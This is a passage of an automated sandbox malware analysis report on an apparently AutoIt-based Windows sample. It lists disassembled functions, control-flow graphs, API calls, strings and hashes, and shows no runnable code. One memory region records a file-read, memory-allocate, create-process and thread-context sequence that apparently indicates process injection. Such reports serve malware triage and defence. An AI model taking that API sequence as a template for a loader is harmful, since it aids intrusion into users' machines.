                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                              • String ID: ,*H$4*H$@fI
                                                                                              • API String ID: 615853336-1459471987
                                                                                              • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                              • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                              • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                              • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                              Function 047383E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2065 47383e0-473848e call 4735de0 2068 4738495-47384bb call 47392f0 CreateFileW 2065->2068 2071 47384c2-47384d2 2068->2071 2072 47384bd 2068->2072 2079 47384d4 2071->2079 2080 47384d9-47384f3 VirtualAlloc 2071->2080 2073 473860d-4738611 2072->2073 2074 4738653-4738656 2073->2074 2075 4738613-4738617 2073->2075 2081 4738659-4738660 2074->2081 2077 4738623-4738627 2075->2077 2078 4738619-473861c 2075->2078 2082 4738637-473863b 2077->2082 2083 4738629-4738633 2077->2083 2078->2077 2079->2073 2084 47384f5 2080->2084 2085 47384fa-4738511 ReadFile 2080->2085 2086 4738662-473866d 2081->2086 2087 47386b5-47386ca 2081->2087 2090 473864b 2082->2090 2091 473863d-4738647 2082->2091 2083->2082 2084->2073 2092 4738513 2085->2092 2093 4738518-4738558 VirtualAlloc 2085->2093 2094 4738671-473867d 2086->2094 2095 473866f 2086->2095 2088 47386da-47386e2 2087->2088 2089 47386cc-47386d7 VirtualFree 2087->2089 2089->2088 2090->2074 2091->2090 2092->2073 2098 473855a 2093->2098 2099 473855f-473857a call 4739540 2093->2099 2096 4738691-473869d 2094->2096 2097 473867f-473868f 2094->2097 2095->2087 2102 47386aa-47386b0 2096->2102 2103 473869f-47386a8 2096->2103 2101 47386b3 2097->2101 2098->2073 2105 4738585-473858f 2099->2105 2101->2081 2102->2101 2103->2101 2106 47385c2-47385d6 call 4739350 2105->2106 2107 4738591-47385c0 call 4739540 2105->2107 2113 47385da-47385de 2106->2113 2114 47385d8 2106->2114 2107->2105 2115 47385e0-47385e4 CloseHandle 2113->2115 2116 47385ea-47385ee 2113->2116 2114->2073 2115->2116 2117 47385f0-47385fb VirtualFree 2116->2117 2118 47385fe-4738607 2116->2118 2117->2118 2118->2068 2118->2073
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 047384B1
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 047386D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileFreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 204039940-0
                                                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                              • Instruction ID: 3302d47250a32f9d9a4452e667daf6a3a3a7850c735fe386232e8d40e3a2a33f
                                                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                              • Instruction Fuzzy Hash: 6CA12770E00208EBDB14DFA4C998BEEBBB5BF48305F208559E111BB382D775AA40CF95
                                                                                              Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2119 401250-40125c 2120 401262-401293 call 412f40 call 401b80 2119->2120 2121 4012e8-4012ed 2119->2121 2126 4012d1-4012e2 KillTimer SetTimer 2120->2126 2127 401295-4012b5 2120->2127 2126->2121 2128 4012bb-4012bf 2127->2128 2129 4272ec-4272f2 2127->2129 2130 4012c5-4012cb 2128->2130 2131 42733f-427346 2128->2131 2132 4272f4-427315 Shell_NotifyIconW 2129->2132 2133 42731a-42733a Shell_NotifyIconW 2129->2133 2130->2126 2134 427393-4273b4 Shell_NotifyIconW 2130->2134 2135 427348-427369 Shell_NotifyIconW 2131->2135 2136 42736e-42738e Shell_NotifyIconW 2131->2136 2132->2126 2133->2126 2134->2126 2135->2126 2136->2126
                                                                                              APIs
                                                                                                • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                              • String ID:
                                                                                              • API String ID: 3300667738-0
                                                                                              • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                              • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                              Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue$CloseOpen
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                              • API String ID: 1586453840-614718249
                                                                                              • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                              • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                              • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                              • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                              Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                              • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                              • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                              • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                              • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                              • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                              Function 04738190 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 04738080: Sleep.KERNELBASE(000001F4), ref: 04738091
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 047382D0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileSleep
                                                                                              • String ID: 126JAQLX8TGRQNB1RKK3K4HJP3
                                                                                              • API String ID: 2694422964-4220706828
                                                                                              • Opcode ID: e77b826369003c6266fd29d4d1644c7f31fb78fe003455d6f695d6b2303182ee
                                                                                              • Instruction ID: 34c4475e285460497639a97c0472cb00c2f42da3c407830759f38a3e9d2b472a
                                                                                              • Opcode Fuzzy Hash: e77b826369003c6266fd29d4d1644c7f31fb78fe003455d6f695d6b2303182ee
                                                                                              • Instruction Fuzzy Hash: 8D61A470D04288DAEF11DBB4C848BDEBBB4AF15304F044199E6487B3C1D7B91B49CB66
                                                                                              Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • _wcsncpy.LIBCMT ref: 00401C41
                                                                                              • _wcscpy.LIBCMT ref: 00401C5D
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                              • String ID: Line:
                                                                                              • API String ID: 1874344091-1585850449
                                                                                              • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                              • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                              • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                              • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                              Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$OpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 1607946009-824357125
                                                                                              • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                              • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                              • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                              • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                              Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                              • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                              • _wcsncpy.LIBCMT ref: 004102ED
                                                                                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                              • _wcsncpy.LIBCMT ref: 00410340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                              • String ID:
                                                                                              • API String ID: 3170942423-0
                                                                                              • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                              • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                              • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                              • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                              Function 00475077 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 390COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Wu
                                                                                              • API String ID: 0-4083010176
                                                                                              • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                              • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                              • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                              • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                              Function 00475300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentTerminate
                                                                                              • String ID: Wu
                                                                                              • API String ID: 2429186680-4083010176
                                                                                              • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                              • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                              • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                              • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                              Function 04737080 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 0473783B
                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 047378D1
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 047378F3
                                                                                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 04737BFC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1532772082.0000000004735000.00000040.00000020.00020000.00000000.sdmp, Offset: 04735000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_4735000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 572931308-0
                                                                                              • Opcode ID: dd5ff2c0333f679b22dfbad47a12c49e5bc70870eaab63e39cb7295a27d4d700
                                                                                              • Instruction ID: a490e34459e5a904794331963ec25786f20d4ca40fbe0cef5ca9a4be53eda873
                                                                                              • Opcode Fuzzy Hash: dd5ff2c0333f679b22dfbad47a12c49e5bc70870eaab63e39cb7295a27d4d700
                                                                                              • Instruction Fuzzy Hash: FF621C70A14258DBEB24CFA4C850BDEB376EF58301F1091A9D10DEB391E776AE81CB59
                                                                                              Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: Error:
                                                                                              • API String ID: 4104443479-232661952
                                                                                              • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                              • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                              • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                              • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                              Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                              Strings
                                                                                              Memory Dump Source
